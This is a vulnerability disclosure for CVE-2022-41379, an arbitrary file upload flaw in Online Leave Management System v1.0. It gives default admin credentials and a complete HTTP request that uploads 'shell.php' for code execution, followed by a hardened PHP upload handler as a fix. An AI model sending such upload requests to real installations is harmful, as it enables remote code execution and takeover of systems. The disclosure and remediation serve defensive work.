CVE-2022-41379: bug_report/RCE-1.md at main · hegeoo/bug_report

An arbitrary file upload vulnerability in the component /leave_system/classes/Users.php?f=save of Online Leave Management System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.


Online Leave Management System v1.0 by oretnom23 has arbitrary code execution (RCE)

BUG_Author: hegeoo

Admin login account: admin/admin123

Vendor: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

Vulnerability URL: http://ip/leave_system/classes/Users.php?f=save

Vulnerability location: There is an arbitrary file upload vulnerability (RCE) in the picture upload point under "Create New" in the "User list" module of the back-end management system.

Request package for file upload:

POST /leave_system/classes/Users.php?f=save HTTP/1.1
Host: 192.168.1.19
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/leave_system/admin/?page=user/manage_user
Content-Length: 809
Content-Type: multipart/form-data; boundary=---------------------------7128709111375
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

-----------------------------7128709111375
Content-Disposition: form-data; name="id"


-----------------------------7128709111375
Content-Disposition: form-data; name="firstname"

111
-----------------------------7128709111375
Content-Disposition: form-data; name="lastname"

111
-----------------------------7128709111375
Content-Disposition: form-data; name="username"

111
-----------------------------7128709111375
Content-Disposition: form-data; name="password"

11
-----------------------------7128709111375
Content-Disposition: form-data; name="type"

2
-----------------------------7128709111375
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/octet-stream

JFJF <?php phpinfo();?>
-----------------------------7128709111375--

Uploaded files are stored in the directory \leave_system\uploads.

We visited the directory of the file in the browser and found that the code had been executed
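The request above succeeds because the "img" part is stored under its client-supplied name and extension. A hardened handler for that field could look like the following added example; it is not the project's code, and the function name store_profile_image(), the 2 MiB limit, the allow-list and the relative uploads path are assumptions.

```php
<?php
// Added example, not the project's code. store_profile_image(), the 2 MiB
// limit and the allow-list are assumptions chosen for illustration.

function store_profile_image(array $file, string $uploadDir): string
{
    // MIME type detected from content => extension the server will assign.
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    $maxBytes = 2 * 1024 * 1024;

    // A single, successful upload only (rejects error codes and img[] arrays).
    if (!isset($file['error'], $file['tmp_name'], $file['size'])
        || !is_int($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed');
    }
    // The temp file must come from this request's POST body.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an HTTP upload');
    }
    if ($file['size'] < 1 || $file['size'] > $maxBytes) {
        throw new RuntimeException('Invalid file size');
    }

    // Decide the type from the file's bytes. The client-supplied filename
    // ("shell.php") and Content-Type header are never consulted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!is_string($mime) || !isset($allowed[$mime])) {
        throw new RuntimeException('Only JPEG, PNG or GIF images are accepted');
    }

    // Server-generated name plus allow-listed extension: even a polyglot that
    // passes the content check is stored as <random>.gif, never as .php.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($uploadDir, '/\\') . DIRECTORY_SEPARATOR . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store upload');
    }
    return $name; // store this in the user record instead of the original name
}

// Usage inside the save handler (field name "img" as in the request above;
// the relative path to the uploads directory is an assumed layout):
// $avatar = store_profile_image($_FILES['img'], __DIR__ . '/../uploads');
```

Serving the uploads directory with PHP execution disabled adds a second layer if one of these checks is ever bypassed.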
